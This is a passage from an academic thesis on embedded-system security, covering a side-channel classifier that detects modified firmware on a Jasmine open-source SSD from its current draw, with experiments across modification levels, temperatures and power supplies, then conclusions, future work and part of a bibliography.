19 for i = 1:numExperiments 76 Chapter 4. Detection of Modified Firmware on Solid State Drives

20 resultsAll{i} = cell(3,1); %each entry of resultsAll will be a 3x1 cell array holding a single experiment's results for logistic regression, QDA, and 3-NN, respectively

21 end

23 %populate the array

24 for i = 1:numExperiments

25 currentDir = fullfile(rootPath,results.dirNames{i});

26 disp(['Processing BEGUN for ' currentDir '.']);

27 for j = 1:numClassifiers

28 for k = 1:NUM_TWO_FOLD_CV_RANDOM_SPLITS

29 resultsJasmine = ClassifyModifiedFirmwareRandFileIndices( currentDir,'analysis_times.txt','Jasmine - Probe','probe', j);

30 resultsAll{i}{j,1} = [resultsAll{i}{j,1} resultsJasmine. performance{1}];

31 end

32 disp(['Finished running ' CLASSIFIERS{j} '.']);

33 end

34 disp(['Processing COMPLETED for ' currentDir '.']);

35 end

37 %now summarize results using the single metric of average accuracy, where

38 %averaging is done over all four possible combinations of testing and training sets. (There

39 %are only four possible combinations because only two batches were

40 %collected for each class).

41 info = sprintf('Rows of results.accuracies correspond to the classifiers listed in results.classifiers, in order.\nColumns of results. accuracies correspond to the directories listed in results.dirNames, in order.\nresults.rootPath gives the parent directory for results. 4.1. Detecting Modified Firmware 77

dirNames. Entries of results.accuracies\nare average classification accuracies, where the averaging is done over all four possible\ ncombinations of testing and training sets. There are four such combinations because two batches\nwere collected for each class.');

42 results.rootPath = rootPath;

43 results.classifiers = CLASSIFIERS;

44 results.accuracies = zeros(numClassifiers,numExperiments);

46 %convert arrays of biolearning.classperformance objects to arrays of

47 %flat structures

48 for i = 1:numExperiments

49 for j = 1:numClassifiers

50 resultsAll{i}{j} = arrayfun(@struct,resultsAll{i}{j});

51 end

52 end

54 %populate results.accuracies

55 for i = 1:numClassifiers

56 for j = 1:numExperiments

57 results.accuracies(i,j) = mean(unique([resultsAll{j}{i}. CorrectRate]));

58 end

59 end

61 %add a completion timestamp

62 results.completionTime = datestr(datevec(now));

64 end

Preliminary examination of a held-out set of two recordings, one from each firmware class 78 Chapter 4. Detection of Modified Firmware on Solid State Drives

(modified and unmodified), suggested that the power in relatively low frequency components of the SSD current signal could be used to discriminate the firmware classes. As an initial processing step in this study, recordings were therefore downsampled by a factor of 104 after lowpass filtering with an 8th order Chebychev Type I filter (8Hz cutoff frequency; 0.05 dB maximal passband ripple), in forward and reverse to achieve zero phase. For each trial, 300 s (seconds) of SSD current were analyzed in 25 s non-overlapping segments. Each segment was transformed to the frequency domain using Welch’s modified periodogram method[96] (10 s Hamming-windowed sub-segments with 5 s of overlap; 256-point Discrete Fourier Trans- forms) to estimate the power spectral density (PSD). The PSD estimate was integrated in non-overlapping frequency bins of 0.5 Hz width, spanning 0 to 10 Hz, and converted to the decibel scale, yielding a 1 x 20 feature vector for each 25 s observation. Each 300 s trial therefore produces a 12 x 20 matrix, with each row representing an observation. These pro- cessing steps are illustrated in Fig. 4.2. These data matrices are then concatenated across the 20 total trials (10 modified and 10 unmodified recordings) in each experiment to produce the complete data set for the experiment. The data set is balanced, with an equal number (n = 120) of observations in each class.

4.1.3 Firmware Binary Classifier

We compared the accuracy of three supervised learning techniques in discriminating firmware classes using these features. The first method was Logistic Regression (LR), in which a lin- ear class boundary is learned by assuming sigmoid models for the posterior probabilities of the two firmware classes (modified and unmodified) and finding the model parameters that maximize the conditional likelihood function [50]. The second method was Quadratic Dis- criminant Analysis (QDA) [50], which can find a curved class boundary (a quadratic surface). In this method, test observations are assigned to the class with largest posterior probability 4.1. Detecting Modified Firmware 79

Figure 4.2: Pre-processing Stage for a Single Current Recording. 80 Chapter 4. Detection of Modified Firmware on Solid State Drives assuming Gaussian class-conditional densities, and model parameters are estimated via max- imum likelihood. The third method of classification was the k Nearest Neighbors (k-NN) algorithm [50], a still more flexible nonlinear method that assigns class labels to test points according to a plurality vote among the closest training points in feature space. For k-NN, we used Euclidean distance as the measure of proximity and 3 as the number of neighbors (k = 3). These three classifiers were selected because they are representative state-of-the practice methods [50] that span the spectrum of model flexibility from linear methods with potentially high bias but low variance to highly non-linear methods with potentially low bias but high variance.

Test set performance was estimated using a 50/50 hold-out set approach, with disjoint train- ing and testing sets each formed by combining one modified firmware batch and one unmod- ified firmware batch. For each experiment, reported classifier accuracy is the average test set accuracy over all four possible combinations of training and testing sets. Technically, due to the stochastic nature of the algorithm we used, this is a probabilistic statement: all four possible combinations were used with > 99.9% probability.

Prior to classifier training, Principal Components Analysis (PCA) was applied to reduce the dimensionality of the feature set. Specifically, we retain the minimum number of principal components required to account for at least 90% of the data variance, as in [24]. Test data are mapped to the principal component space of the training data before they are classified, as described in Fig. 4.3. Fig. 4.4 shows clear separation of the modified and unmodified firmware classes at 50C in principal component space, which accounts for the high accuracies of the classifiers. 4.1. Detecting Modified Firmware 81

Figure 4.3: Processing Stage for a Batch of Current Recordings. 82 Chapter 4. Detection of Modified Firmware on Solid State Drives

Figure 4.4: Scatter plot of first 3 Principal Components for unmodified Greedy vs. Greedy- 50% firmware at 50C. 4.2. Classifying Different Levels of Modification 83

4.2 Classifying Different Levels of Modification

The first goal is to build binary classifiers to distinguish different versions of modified Greedy firmware from the original, unmodified version. When the OS writes a file to the Jasmine SSD, data is first stored to the SSD DRAM buffers until ftl_write calls from the FTL are issued to move small segments of data to the appropriate location within the flash array. Due to the dynamic characteristics of the FTL, such as wear leveling and garbage collection, these segments are scattered throughout the flash array, but the distribution is uniform. This means that any call to ftl_write has an equal chance of writing to any of the eight banks in flash memory. The firmware modification in this research is a full clearance of the DRAM read and write buffers (64MB), which occurs conditionally. This condition is set based on the current bank chosen during an ftl_write. With a total of eight banks, there is a 1/8, or 12.5%, chance of any particular bank being selected. To control the probability of an erasure event, we can choose how many banks we allow to cause the condition to evaluate as True. We define a modified version of our Greedy firmware to be a ”Greedy-X%” firmware, where X denotes the percentage probability that a DRAM clearance will occur upon evaluating the condition. For example, if selection of bank 0 or 1 causes the condition to evaluate as True, there would be a 2/8, or 25%, chance of a DRAM erasure event. This would be called a Greedy-25% variant of the firmware.

To space out the conditional occurrences of data erasure, we only evaluate the condition after every 1000th ftl_write command, but not on the preceding 999. This spacing between possible erasures bounds the intrusiveness of our modification on normal user operations. Based on the size of DRAM buffers and the average number of DRAM clearance operations observed in our collections of Greedy-100% firmware (the maximum effect), this could impact up to 40% of the user data. 84 Chapter 4. Detection of Modified Firmware on Solid State Drives

Since favorable results were already achieved with Greedy-50% firmware[24], we collect data with reduced granularity for higher probabilities to establish the maximum classification accuracy achieved with Greedy-100%. To seek out a minimum threshold for classification, we collect data at lower probabilities with the maximum granularity of 12.5%. The final set of probabilities examined is 0%, 12.5%, 25%, 37.5%, 50%, 75%, and 100%. We differentiate between the original Greedy Flash Translation Layer (FTL) and a Greedy-0% FTL as the latter includes code to support the DRAM clearance modification, yet keeps the probability fixed at 0%. Operationally, these two versions should appear to be nearly identical.

An example of a comparison between firmware with different probabilities of modification can be seen in Fig. 4.5. Here, arrows are added beneath each visible transient in the time domain. The salience of these transients gives confidence that there are current draw changes which may be classifiable in the frequency domain using our techniques described below. As expected, note that the Greedy-100% produces more frequent transients than in Fig. 3.5 (recorded with Greedy-50%).

For collection, we must perform a run for each desired modified firmware version. That run consists of four batches: a batch with the unmodified FTL, then a batch with the FTL modified to that probability, then another unmodified batch, and finally another modified batch. Interleaving the batches of modified and unmodified firmware classes weakens the direct relationship between firmware class and time of collection, ensuring that the classifier cannot spuriously leverage features of the SSD current signature that might be correlated with time but not firmware class in discriminating the two classes. Each of the batches consists of five identical trials.

For every trial, the factory mode jumper on the Jasmine SSD board is checked to verify it is in normal operating mode and will present itself as an SSD to the host system to which it is attached. The Jasmine is then powered on and the current probe is attached to its 4.2. Classifying Different Levels of Modification 85

Figure 4.5: Current over time comparison between Greedy and Greedy-100% firmware.

Serial Advanced Technology Attachment (SATA) power supply line. This current probe is connected to a Tektronix TCPA300 amplifier which needs to be calibrated before the start of the trial by detaching the probe from the SATA power line and pressing the Autobalance button. The amplifier signal is then directed into the Gen3i data recorder for time domain signal capture at 14 bits per sample and 200,000 samples per second [83]. The start and finish of a trial are triggered via serial port impulses. We use a script on the host system to programmatically format the Jasmine SSD, start the trial, then write 1000 randomly generated 10 MB files to the Jasmine SSD and end the trial. Each trial lasts for six minutes on average. Following each trial, the Gen3i is configured to immediately export the current draw time series data to a MATLAB formatted file for follow-on processing. This export process is mainly responsible for the delay between trials (typically 10-12 minutes per trial) which is proportional to the amount of data collected. 86 Chapter 4. Detection of Modified Firmware on Solid State Drives

In Fig. 4.6, the results of classifying current drawn for different versions of modified Greedy firmware compared to the current drawn for the original unmodified firmware are shown. As noted earlier, Greedy-0% includes code to support the DRAM clearance modification, yet keeps the probability of erasure at 0%. This is a slight change to the firmware and as shown in Table 4.1, the accuracy in detecting this change is only slightly better than chance. As expected, the higher the probability of erasures, the greater the change in how the firmware operates, resulting in better accuracy for all three binary classifiers up to perfect or near-perfect accuracy.

Table 4.1: Accuracy of Binary Classifiers (% Modification of Firmware)

LR QDA kNN 0% 0.5375 0.5292 0.5542 12.5% 0.6417 0.6417 0.6604 25% 0.8250 0.8292 0.8167 37.5% 0.8583 0.8771 0.8833 50% 0.9187 0.9500 0.9646 75% 0.9729 0.9833 0.9854 100% 0.9958 1.0000 0.9958

4.3 Classifying at Different Temperatures

The second experiment tests the robustness of the classifier across realistic operating envi- ronments, starting with varying temperatures. As seen in Fig. 4.7, we control temperature manually using an electric heating pad connected to a variac (variable autotransformer) and measure it using an Analog Devices TMP35 temperature sensor, which is attached to the Barefoot controller using a silver thermal compound to achieve good thermal contact. The sensor output is monitored using an oscilloscope. Underneath the Jasmine board, the heating pad is placed in an area which will direct heat to the base of the Barefoot controller (as shown 4.3. Classifying at Different Temperatures 87

Figure 4.6: Classifier performance vs. Greedy-X%

in Fig. 4.8). Prior to a trial, the variac is slowly turned up to the desired temperature while monitoring the oscilloscope output in preview mode. The average temperature is allowed to settle to near constant for several minutes before the start of a trial. The actual aver- age temperature sensed after settling is often higher than the variac set point, which, along with the operational temperature of the microcontroller, explains the differences between the temperature setting and the temperature observed in Fig. 4.9.

We set the heating pad for these trials to temperatures in an expected operating range for storage drives [80]. This range includes 25C (the baseline ”room” temperature for all other experiments), 30C, 35C, 40C, 45C, and 50C, though the operating circuitry on the Jasmine board tends to raise the temperature higher during trails as shown in Fig. 4.9. The run at each temperature consists of four batches collected using the same interleaving strategy described above, with five trials in each batch, except that the batches with modified firmware are always Greedy-50%. 88 Chapter 4. Detection of Modified Firmware on Solid State Drives

Figure 4.7: Top view of Jasmine board set up for temperature data collection. 4.3. Classifying at Different Temperatures 89

Figure 4.8: Bottom view of Jasmine board with heating pad placement. 90 Chapter 4. Detection of Modified Firmware on Solid State Drives

Figure 4.9: Temperature settings compared to actual temperatures observed during a trial.

An example of the differences in recorded current between firmware at a higher operating temperature than the 25C baseline is shown in Fig. 4.10. Arrows are added beneath each visible transient to highlight the frequency of occurrence.

In Fig. 4.11, which is a plot of accuracy versus temperature for all three classifiers, the results of classifying current drawn for different temperatures are shown, from room temperature (25C) up to 50C. At all temperatures, the classification is applied to the case of Greedy- 50% versus unmodified Greedy firmware. All three classifiers are robust to changes in the temperature of the SSD within a reasonable operating range, with accuracies greater than 90%. 4.3. Classifying at Different Temperatures 91

Figure 4.10: Current over time comparison between Greedy and Greedy-50% firmware both at 45C. 92 Chapter 4. Detection of Modified Firmware on Solid State Drives

Table 4.2: Robustness of Binary Classifiers with Temperature Variation (with 50% Proba- bility of Modification)

LR QDA kNN Room Temp 0.9042 0.9208 0.9250 30C 0.9167 0.9146 0.9333 35C 0.9313 0.9458 0.9396 40C 0.9417 0.9500 0.9583 45C 0.9396 0.9375 0.9437 50C 0.9500 0.9479 0.9542

4.4 Classifying with Different Power Supplies

In the final experiment, we compare the performance of the classifier when the Jasmine board is powered by the internal stock power supply to when it is powered by two different external power supply units. To investigate this, experiments were run using the stock power supply of the testing computer system, a high efficiency power supply, and a premium power supply that is more likely to be found in a higher-end system (e.g., a gaming computer). The stock power supply is a 350W Seasonic SS-350ET Active PFC F3. It is an 80Plus Bronze class power supply rated at 82% efficiency1. The premium power supply is a 550W EVGA SuperNOVA 550 G2. It is an 80Plus Gold power supply rated at 90% efficiency2. The last power supply we test is the 460W Dynapower USA TC-1U46P80, to give a head-to-head comparison with the EVGA Supoernova as external supplies. The Dynapower is an 80Plus class power supply rated at 86% efficiency3. All three Power Supply Units (PSUs) employ active power factor correction.

For the power supply testing, we compare the performance of the classifier when the Jasmine

1https://www.newegg.com/seasonic-80-plus-ss-350et-bronze-350w/p/N82E16817151077/ (Last Accessed 02-Jul-2019) 2http://www.evga.com/products/Specs/PSU.aspx?pn=c882f52c-92c4-4f95-9a0e-f4c9f8c183a6 (Last Ac- cessed 02-Jul-2019) 3http://www.dynapowerusa.com/product/1u-power-supply-80plus-460w-tc-1u46p80 (Last Accessed 02- Jul-2019) 4.4. Classifying with Different Power Supplies 93

Figure 4.11: Classifier performance vs. temperature (classifies Greedy and Greedy-50%).

board is powered by the internal stock power supply to when it is powered by two different external power supply units. We perform three runs, one with each power supply unit providing power to the Jasmine board. The runs for these power supplies consist of four batches interleaved in the same manner as temperature collections. Again, each batch was made up of 5 identical trials as described above.

An example of the differences in recorded current between modified and unmodified firmware when the Jasmine board is supplied by an external PSU is provided in Fig. 4.12. Note that the frequency at which transients occur is similar between this supplied power experiment and other experiments (Figs. 3.5 and 4.10) where Greedy-50% is used.

In Fig. 4.13, the results of classifying current drawn by the Jasmine SSD from different power supplies are shown. These are the Seasonic, Dynapower, and EVGA power supplies. With each PSU, the experiment is run with the original Greedy firmware versus the 50% probability modified version. We verify that the classifier remains highly accurate as the 94 Chapter 4. Detection of Modified Firmware on Solid State Drives

Figure 4.12: Current over time comparison between Greedy and Greedy-50% firmware both using an external power supply. 4.4. Classifying with Different Power Supplies 95 power supply for the SSD is changed as displayed in Table 4.3. Again, we see accuracy of approximately 90% or better with all three power supplies tested, demonstrating the robustness of classification in the face of an external hardware configuration change.

Table 4.3: Robustness of Binary Classifiers with Power Supply (with 50% Probability of Modification)

LR QDA kNN Internal (Seasonic) 0.9167 0.8854 0.9083 External (Dynapower) 0.9375 0.9500 0.9688 External (EVGA) 0.9583 0.9604 0.9604

Figure 4.13: Robustness of Binary Classifiers with Power Supply changes (classifies Greedy and Greedy-50%). For each classifier (LR, QDA, kNN), accuracy bars are for the Internal Seasonic (left), External Dynapower (middle), and External EVGA (right) power supplies. 96 Chapter 4. Detection of Modified Firmware on Solid State Drives

4.5 Classifying in Dynamic Conditions

The classification work done thus far has concentrated on training the classifier under one set of conditions and then testing it under the same set of conditions. For example, training the classifier at 50C and testing at 50C. In operational environments, the conditions are likely to be much more dynamic. It is useful to know if our classifier maintains its accuracy as these conditions change.

We check the dynamic applicability of our QDA classifier by training it at each temperature shown in Table 4.2 and testing each one against all training temperatures. The results are included in Fig. 4.14.

Figure 4.14: QDA classifier performance trained and tested at each temperature.

We check the dynamic applicability of our QDA classifier by training it with each power supply shown in Table 4.3 and testing each one against the other power supplies. The 4.5. Classifying in Dynamic Conditions 97 results are shown in Fig. 4.15.

Figure 4.15: QDA classifier performance trained and tested with each power supply.

These plots seem to suggest that our QDA classifier is sufficiently generalized for classification across power supplies as all accuracies remain above 94%. However, the results for different temperatures could require further investigation as accuracies for temperatures between 30C and 45C remain above 90%, but tests involving the highest and lowest temperatures are producing outlier results. Chapter 5

Conclusions

This work has shed light on the state of security in modern embedded devices based on the ARM architecture.

In chapter 2, we discovered that devices in the current embedded ecosystem are implement- ing basic security controls, but not enough to defend against a determined and skilled modern attacker. These devices make memory protection techniques like non-executable stacks and write XOR execute policies available, yet they are neither mandatory nor enabled by default. Even if these techniques are adopted, they only protect against the previous generation of vulnerabilities, for example the classic stack-based buffer overflow. These devices are still not equipped to mitigate modern attacks like Return Oriented Programming which accomplish the goals of an attacker without injecting any new code.

This weakness was demonstrated on the Cortex-M4F using the example of a Tiva TM4C123GH6PM. It has been shown that even small areas of existing program code are enough to reprogram the flash memory of a resource constrained device using ROP. The practice of loading the on-chip ROM with peripheral libraries and other potentially unused code makes it a prime target for ROP attacks. The gadget sets needed to erase and reprogram the flash memory were quite small, and therefore could likely be found in many simple programs. A portion of flash memory can be erased using only 4 gadgets. It has also been shown that a Turing- complete gadget set can be identified in the peripheral driver libraries which would allow for arbitrary execution if a device was compromised. We discussed various return-like instruc-

98 99

tions that can be used for ROP on this device and have introduced a novel technique. We have also located gadgets which allow us to control the stack pointer making efficient loops possible.

Defense against ROP attacks has been explored with popular approaches to include ROP- Gaurd [47], ROPecker [32], and kBouncer [73]. Unfortunately, these techniques add signif- icant overhead to the system and have all been bypassed in a more rigorous analysis [81]. Therefore, they are not currently practical to implement in a resource constrained embed- ded device. We have shown that omission of modern security controls leaves a plethora of resource constrained products wide open to attack. Successful defense against ROP that is practical for resource constrained embedded systems remains a topic that requires the attention of the security research community.

In chapters 3 and 4, we analyzed the security of Solid State Drives, which are fully self- contained embedded systems that are increasingly responsible for the storage and protection of critical and sensitive data. We learned that SSDs contain a complex and layered firmware which presents a viable vector for attack [22]. Unfortunately, these devices and their firmware are entirely proprietary leaving researchers and consumers with no simple means of validating the authenticity of the firmware or testing for resident indicators of compromise.

This work presented and evaluated a framework for non-intrusively verifying the integrity of SSD firmware. It demonstrated that a classifier can be trained to detect modifications to the firmware running on an embedded device. This classifier processed current draw data from trials running on the open-source Jasmine board. It was able to distinguish modified firmware from unmodified firmware with increasing accuracy as the probability of modification increased. With Greedy-50% or higher percentage versions, the classifier accuracy was above 90% in all cases, and at least 95% for QDA and k-NN approaches. One of the goals alluded to in Section4.2 was to seek a minimum threshold for classification. The 100 Chapter 5. Conclusions results given in Table 4.1 show that if we define 80% as an acceptable level of classification accuracy, there would need to be at least a 25% probability of erasure for this modification of Jasmine SSD firmware to be reliably detected.

The results of this work also demonstrated that a classifier of firmware can be resilient to changes in its environment such as temperature. While changing the temperature experi- enced by the SSD to several representative values within the expected operating range of a storage drive[80], the classifier was still able to classify modified firmware from unmodi- fied firmware with over 90% accuracy with all three classification methods. Further, it was demonstrated that a firmware classifier can be resilient to hardware configuration changes. Specifically, the PSU used to supply power to the Jasmine SSD was varied and all three clas- sification methods performed with approximately 90% accuracy, if not higher. The results in Table 4.3 suggest that classification could be more accurate with a dedicated external PSU which is not sharing its energy resources with all the other PC components.

Finally, this work contributed a threat model to assist manufacturers and end users in assessing risk to SSD firmware. It described how threats to firmware could be considered across Ownership, Internet, and Physical Trust Boundaries. Historically, attackers have been continually able to find and exploit weaknesses even in highly valued and secured systems while security for embedded systems, like SSDs, received less focus. It is clear that firmware verification tools, such as the classifier presented here, are needed to detect stealthy modifications to proprietary embedded systems.

5.1 Future Work

Defense against ROP attacks has been explored with popular approaches to include ROP- Gaurd [47], ROPecker [32], and kBouncer [73]. Unfortunately, these techniques add signifi- 5.2. Closing 101

cant overhead to the system and have all been bypassed in a more rigorous analysis [81]. The development of practical defenses against ROP for resource constrained embedded systems is a topic that requires more attention in future research.

We demonstrated the ability to classify modified vs. unmodified versions of firmware on an open source platform using current draw measurements. A logical follow-on avenue of research would be to evaluate the ability of this technique to classify modified vs. unmodified versions of firmware on commercial (proprietary) solid state drives. While these proprietary drives are, by their nature, closed systems, recent work has demonstrated that it is possible, in some cases, to not only examine but alter the installed firmware on these drives [70].

Other potential follow-on work includes categorizing and attempting to classify varying “classes” of modifications. In this work we demonstrated the ability to classify based on changes to the firmware that affected the associated DRAM buffers. Future work, for ex- ample, could address modifications that impacted the wear-leveling functionality (hence, reliability) of the solid state drive.

Finally, follow-on research in this area could explore firmware modification classification using current draw on other embedded devices. This could include but would not be limited to novel memory devices such as the recently released Intel Optane family1 as well as non- memory devices such as point-of-sale registers, 3D printers, and the vast spectrum of IoT products on the market.

5.2 Closing

In closing, these research findings show that modern security paradigms, while effective, are designed for the faster and more capable end user and enterprise systems. Designers need to

1https://www.intel.com/content/www/us/en/architecture-and-technology/optane-memory.html 102 Chapter 5. Conclusions carefully consider the security model of resource constrained embedded systems since they are far more prevalent than general purpose computers and are increasingly adding network connectivity which subjects these devices to the same threats as systems without similar resource constraints. Bibliography

[1] Fundamentals of armv8-a. https://static.docs.arm.com/100878/0100/ fundamentals_of_armv8_a_100878_0100_en.pdf, . Accessed: 2018-04-07.

[2] Arm infocenter. http://infocenter.arm.com/help/index.jsp, . Accessed: 2017- 04-25.

[3] Arm trustzone developer guide. https://developer.arm.com/technologies/ trustzone, . Accessed: 2018-04-07.

[4] Boostxl-senshub sensor hub boosterpack. http://www.ti.com/lit/ug/spmu290/ spmu290.pdf. Accessed: 2018-04-14.

[5] Cortex-m4 devices generic user guide. http://infocenter.arm.com/help/index. jsp?topic=/com.arm.doc.dui0553a/CHDCHEAG.html, . Accessed: 2017-04-25.

[6] Cortex-M Series Family description. http://www.arm.com/products/processors/ cortex-m, . Accessed: 2017-04-25.

[7] Arm and thumb-2 instruction set quick reference card. http://infocenter.arm.com/ help/topic/com.arm.doc.qrc0001m/QRC0001_UAL.pdf. Accessed: 2017-04-25.

[8] Thumb-2 technology. https://pax.grsecurity.net/docs/noexec.txt. Accessed: 2017-04-25.

[9] Radare2 download page. https://radare.org/r/down.html. Accessed: 2017-04-25.

[10] The thumb instruction set. http://infocenter.arm.com/help/index.jsp?topic= /com.arm.doc.ddi0210c/CACBCAAE.html, . Accessed: 2017-04-25.

103 104 BIBLIOGRAPHY

[11] Thumb-2 technology. http://infocenter.arm.com/help/index.jsp?topic=/com. arm.doc.dui0471k/pge1358786963523.html, . Accessed: 2017-04-25.

[12] µvision user’s guide. http://www.keil.com/support/man/docs/uv4/uv4_ debugging.htm. Accessed: 2018-04-14.

[13] Microcontroller development kit. https://www.keil.com/demo/eval/armv4.htm. Accessed: 2018-04-14.

[14] Jim Aarestad, Dhruva Acharyya, Reza Rad, and Jim Plusquellic. Detecting trojans through leakage current analysis using multiple supply pad iddqs. IEEE Transactions on information forensics and security, 5(4):893–904, 2010.

[15] Martín Abadi, Mihai Budiu, Úlfar Erlingsson, and Jay Ligatti. Control-flow integrity principles, implementations, and applications. ACM Transactions on Information and System Security (TISSEC), 13(1):4, 2009.

[16] Sahel Alouneh, Mazen Kharbutli, and Rana AlQurem. A software approach for stack memory protection based on duplication and randomisation. International Journal of Internet Technology and Secured Transactions, 6(4):324–348, 2016.

[17] Cortex-M4 Technical Reference Manual. ARM, 2010. Revision r0p0.

[18] 8-bit Atmel Mirocontroller with 128KBytes In-System Programmable Flash. ATMEL, 2011. Rev. 2467X-AVR-06/11.

[19] AVR Instruction Set Manual. ATMEL, 2016.

[20] AP Barroso, VH Machado, and V Cruz Machado. Identifying vulnerabilities in the supply chain. In Industrial Engineering and Engineering Management, 2009. IEEM 2009. IEEE International Conference on, pages 1444–1448. IEEE, 2009. BIBLIOGRAPHY 105

[21] Mostafa Bazzaz, Mohammad Salehi, and Alireza Ejlali. An accurate instruction-level energy estimation model and tool for embedded systems. IEEE transactions on in- strumentation and measurement, 62(7):1927–1934, 2013.

[22] Martijn Bogaard and Yonne de Bruijn. The evil ssd project when your storage has a mind of its own. 2015.

[23] Rodrigo Branco and Shay Gueron. Blinded random corruption attacks. In 2016 IEEE International Symposium on Hardware Oriented Security and Trust (HOST), pages 85–90. IEEE, 2016.

[24] Dane Brown, Owens Walker, Ryan Rakvic, Robert W. Ives, Hau Ngo, James Shey, and Justin Blanco. Towards detection of modified firmware on solid state drives via side channel analysis. In Proceedings of the International Symposium on Memory Systems, MEMSYS ’18, pages 315–320, New York, NY, USA, 2018. ACM. ISBN 978-

1-4503-6475-1. doi: 10.1145/3240302.3285860. URL http://doi.acm.org/10.1145/ 3240302.3285860.

[25] Erik Buchanan, Ryan Roemer, Hovav Shacham, and Stefan Savage. When good in- structions go bad: Generalizing return-oriented programming to risc. In Proceedings of the 15th ACM conference on Computer and communications security, pages 27–38. ACM, 2008.

[26] Kil3r Bulba. Bypassing stackguard and stackshield. 2000.

[27] JonPaul Canclini, James McMasters, James Shey, Owens Walker, Ryan Rakvic, Hau Ngo, and Kevin D Fairbanks. Inferring read and write operations of solid-state drives based on energy consumption. In Ubiquitous Computing, Electronics & Mobile Com- munication Conference (UEMCON), IEEE Annual, pages 1–6. IEEE, 2016. 106 BIBLIOGRAPHY

[28] Yuan-Hao Chang, Jen-Wei Hsieh, and Tei-Wei Kuo. Endurance enhancement of flash- memory storage, systems: An efficient static wear leveling design. In Design Automa- tion Conference, 2007. DAC’07. 44th ACM/IEEE, pages 212–217. IEEE, 2007.

[29] Stephen Checkoway, Ariel J Feldman, Brian Kantor, J Alex Halderman, Edward W Felten, and Hovav Shacham. Can dres provide long-lasting security? the case of return-oriented programming and the avc advantage. EVT/WOTE, 2009, 2009.

[30] Stephen Checkoway, Lucas Davi, Alexandra Dmitrienko, Ahmad-Reza Sadeghi, Hovav Shacham, and Marcel Winandy. Return-oriented programming without returns. In Proceedings of the 17th ACM conference on Computer and communications security, pages 559–572. ACM, 2010.

[31] Feng Chen, David A Koufaty, and Xiaodong Zhang. Understanding intrinsic character- istics and system implications of flash memory based solid state drives. In ACM SIG- METRICS Performance Evaluation Review, volume 37, pages 181–192. ACM, 2009.

[32] Yueqiang Cheng, Zongwei Zhou, Yu Miao, Xuhua Ding, Huijie DENG, et al. Ropecker: A generic and practical approach for defending against rop attack. 2014.

[33] Mei-Ling Chiang, Paul CH Lee, and Ruei-Chuan Chang. Using data clustering to improve cleaning performance for flash memory. Software: Practice and Experience, 29(3):267–290, 1999.

[34] William Hohl Christopher Hinds. Arm : Fundamentals And Tech- niques. 2 edition, 2014. ISBN 978-1482229851.

[35] Hyunmo Chung. Introduction to barefoot. OpenSSD Workshop, South Korea, 2011.

[36] Shane S Clark, Benjamin Ransford, Amir Rahmati, Shane Guineau, Jacob Sorber, Wenyuan Xu, Kevin Fu, A Rahmati, M Salajegheh, D Holcomb, et al. Wattsupdoc: BIBLIOGRAPHY 107

Power side channels to nonintrusively discover untargeted malware on embedded med- ical devices. In HealthTech, 2013.

[37] Andrei Costin, Jonas Zaddach, Aurélien Francillon, and Davide Balzarotti. A large- scale analysis of the security of embedded . In Proceedings of the 23rd USENIX Conference on Security Symposium, SEC’14, pages 95–110, Berkeley, CA,

USA, 2014. USENIX Association. ISBN 978-1-931971-15-7. URL http://dl.acm. org/citation.cfm?id=2671225.2671232.

[38] Crispan Cowan, Calton Pu, Dave Maier, Jonathan Walpole, Peat Bakke, Steve Beattie, Aaron Grier, Perry Wagle, Qian Zhang, and Heather Hinton. Stackguard: automatic adaptive detection and prevention of buffer-overflow attacks. In Usenix Security, vol- ume 98, pages 63–78, 1998.

[39] Crispin Cowan, Steve Beattie, Ryan Finnin Day, Calton Pu, Perry Wagle, and Erik Walthinsen. Protecting systems from stack smashing attacks with stackguard. In Expo, 1999.

[40] Crispin Cowan, F Wagle, Calton Pu, Steve Beattie, and Jonathan Walpole. Buffer overflows: Attacks and defenses for the vulnerability of the decade. In DARPA In- formation Survivability Conference and Exposition, 2000. DISCEX’00. Proceedings, volume 2, pages 119–129. IEEE, 2000.

[41] Filipe Augusto da Luz Lemos, Rubens Alexandre de Faria, Paulo Jose Abatti, Mauro Sergio Pereira Fonseca, and Keiko Veronica Ono Fonseca. Memory auditing for de- tection of compromised switches in software-defined networks using trusted execution environment. In Developments and Advances in Defense and Security, pages 77–85. Springer, 2020. 108 BIBLIOGRAPHY

[42] Rachna Dhamija, J Doug Tygar, and Marti Hearst. Why phishing works. In Pro- ceedings of the SIGCHI conference on Human Factors in computing systems, pages 581–590. ACM, 2006.

[43] J Domburg. Hard disk hacking. In SpritesMods.com, 2013. URL http:// spritesmods.com/?art=hddhack.

[44] Pavel Mikhailovich Dovgalyuk and Vladimir Alekseyevich Makarov. When stack pro- tection does not protect the stack? Trudy instituta sistemnogo programmirovaniya RAN, 28(5):55–72, 2016.

[45] Amitai Etzioni. Cyber trust. Journal of Business Ethics, 156(1):1–13, 2019.

[46] Aurélien Francillon and Claude Castelluccia. Code injection attacks on harvard- architecture devices. In Proceedings of the 15th ACM conference on Computer and communications security, pages 15–26. ACM, 2008.

[47] Ivan Fratrić. Ropguard: Runtime prevention of return-oriented programming attacks, 2012.

[48] Jack Ganssle. The shape of the mcu market, March 2016. URL

https://www.embedded.com/electronics-blogs/break-points/4441588/ The-shape-of-the-MCU-market.

[49] Carlos Aguayo Gonzalez and Alan Hinton. Detecting malicious software execution in programmable logic controllers using power fingerprinting. In International Conference on Critical Infrastructure Protection, pages 15–27. Springer, 2014.

[50] Trevor Hastie, Robert Tibshirani, and Jerome Friedman. The Elements of Statistical Learning: Data Mining, Inference, and Prediction. Springer Science & Business Media, 2009. BIBLIOGRAPHY 109

[51] Jarilyn Hernandez Jimenez and Katerina Goseva-Popstojanova. Malware detection using power consumption and network traffic data. In 2nd International Conference on Data Intelligence and Security, 07 2019. doi: 10.1109/ICDIS.2019.00016.

[52] Andrei Homescu, Michael Stewart, Per Larsen, Stefan Brunthaler, and Michael Franz. Microgadgets: size does matter in turing-complete return-oriented programming. In Proceedings of the 6th USENIX conference on Offensive Technologies, pages 7–7. USENIX Association, 2012.

[53] Mark Hung. Leading the iot, gartner insights on how to lead in a connected world. Gartner Research, pages 1–29, 2017.

[54] Stewart J. and Dedhia V. Rop compiler. http://www.keil.com/support/man/docs/ uv4/uv4_debugging.htm. Accessed: 2018-04-14.

[55] Athanasios Karakasiliotis, SM Furnell, and Maria Papadaki. An assessment of end- user vulnerability to phishing attacks. Journal of Information Warfare, 6(1):17–28, 2007.

[56] Atsuo Kawaguchi, Shingo Nishioka, and Hiroshi Motoda. A flash-memory based file system. In USENIX, pages 155–164, 1995.

